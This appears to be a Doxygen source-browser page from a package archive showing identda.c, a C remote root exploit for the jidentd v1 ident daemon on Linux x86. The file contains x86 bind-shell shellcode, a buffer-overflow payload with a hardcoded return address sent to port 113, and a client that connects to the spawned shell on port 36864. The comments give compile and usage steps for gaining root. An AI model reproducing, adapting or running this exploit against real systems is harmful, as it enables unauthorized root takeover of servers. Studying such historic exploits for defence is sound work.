Logo Search packages:      
Sourcecode: raccess version File versions  Download package

identda.c

/*
 *  Copyright (c) anathema <anathema@hack.co.za>
 *  All rights reserved.
 *
 *  jidentd v1 remote root exploit (linux x86).
 *  THIS IS UNPUBLISHED PRIVATE SOURCE CODE -- DO NOT DISTRIBUTE.
 */

/*
 *  compile : gcc -o own own-jidentd.c
 *  usage   : ./own hostname
 *   or     : ./own hostname offset
 *
 *  When you get the `0wned` prompt, you are in an interactive shell.
 *  Type `id` or `whoami` and see that you are r00t ;)
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <memory.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

char c0de[] =
  "\xeb\x49\x5e\x29\xc0\x29\xdb\x40\x89\x46\x04\x40\x89\x06\xb0\x06\x89\x46"
  "\x08\xb0\x66\x43\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x90"
  "\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x29\xc0\x89\x46\x10\xb0\x10\x89"
  "\x46\x08\xb0\x66\x43\xcd\x80\x29\xc0\x40\x89\x46\x04\xb3\x04\xb0\x66\xcd"
  "\x80\xeb\x02\xeb\x4c\x29\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\x43\xcd\x80"
  "\x88\xc3\x29\xc9\xb0\x3f\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80"
  "\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46\x04\x29"
  "\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
  "\x56\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\x64\xff\xff\xff";

#define AUTH_PORT       113
#define BD_PORT               36864
#define RETPOS                2090
#define ADDR                  0xbffffa94

u_long
resolve_host(u_char *host_name)
{
  struct in_addr addr;
  struct hostent *host_ent;

  addr.s_addr = inet_addr(host_name);
  if (addr.s_addr == -1)
    {
      host_ent = gethostbyname(host_name);
      if (!host_ent) return(-1);
      memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
    }

  return(addr.s_addr);
}

void
shellz(u_long dst_ip)
{
  struct sockaddr_in sin;
  u_char sock_buf[4096];
  fd_set fds;
  int sock;

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sock == -1)
    {
      perror("socket allocation");
      exit(-1);
    }

  sin.sin_family  = AF_INET;
  sin.sin_port    = htons(BD_PORT);
  sin.sin_addr.s_addr = dst_ip;

  if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
      perror("connect");
      close(sock);
      exit(-1);
    }

  fprintf(stderr, "0wned\n");
  for (;;)
    {
      FD_ZERO(&fds);
      FD_SET(0, &fds);
      FD_SET(sock, &fds);

      select(255, &fds, NULL, NULL, NULL);
      memset(sock_buf, 0, sizeof(sock_buf));

      if (FD_ISSET(sock, &fds))
        {
          if (recv(sock, sock_buf, sizeof(sock_buf), 0) == -1)
            {
              fprintf(stderr, "Connection closed by remote host.\n");
              close(sock);
              exit(0);
            }

          fprintf(stderr, "%s", sock_buf);
        }

      if (FD_ISSET(0, &fds))
        {
          read(0, sock_buf, sizeof(sock_buf));
          write(sock, sock_buf, strlen(sock_buf));
        }
    }

  /* NOTREACHED */
}

void
snd_res(int sock, u_char *buf, ...)
{
  u_char tmp[4096];
  va_list list;

  memset(tmp, 0, sizeof(tmp));
  va_start(list, buf);
  vsnprintf(tmp, sizeof(tmp), buf, list);
  write(sock, tmp, strlen(tmp));
  va_end(list);
}

void
usage(u_char *nomenclature)
{
  fprintf(stderr, "No.\nusage:\t%s dst_ip [offset]\n", nomenclature);
  exit(-1);
}

int
main(int argc, char **argv)
{
  struct sockaddr_in sin;
  struct in_addr dst_addr;
  u_long dst_ip, addr, *ret;
  u_char buf[4096];
  int sock,
  i = 0, j = 0,
             offset,
             retpos = RETPOS;

  if (argc != 2 && argc != 3)
    {
      usage(argv[0]);
      /* NOTREACHED */
    }

  if (argc > 2) offset = atoi(argv[2]);

  dst_ip = resolve_host(argv[1]);
  if (dst_ip == -1)
    {
      fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
      exit(-1);
    }

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sock == -1)
    {
      perror("socket allocation");
      exit(-1);
    }

  sin.sin_family = AF_INET;
  sin.sin_port   = htons(AUTH_PORT);
  sin.sin_addr.s_addr = dst_ip;

  if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
      perror("connecting to ident daemon");
      close(sock);
      exit(-1);
    }

  addr = ADDR + offset;
  dst_addr.s_addr = dst_ip;
  fprintf(stderr, "The eyes of stanley pain:\n"
          "  To: %s.%d\n"
          " Ret: %d\n"
          "Addr: 0x%lx\n",
          inet_ntoa(dst_addr), AUTH_PORT, retpos, addr);

  memset(buf, 0x90, sizeof(buf));
  for (i = (retpos - strlen(c0de)); i < retpos; j++, i++)
    {
      buf[i] = c0de[j];
    }

  buf[retpos + 5] = 0;
  ret  = (u_long *)(buf + RETPOS);
  *ret = addr;

  snd_res(sock, "%s\r\n", buf);
  sleep(4);
  shellz(dst_ip);

  /* NOTREACHED */
}

/*                    www.hack.co.za              [2000]*/

Generated by  Doxygen 1.6.0   Back to index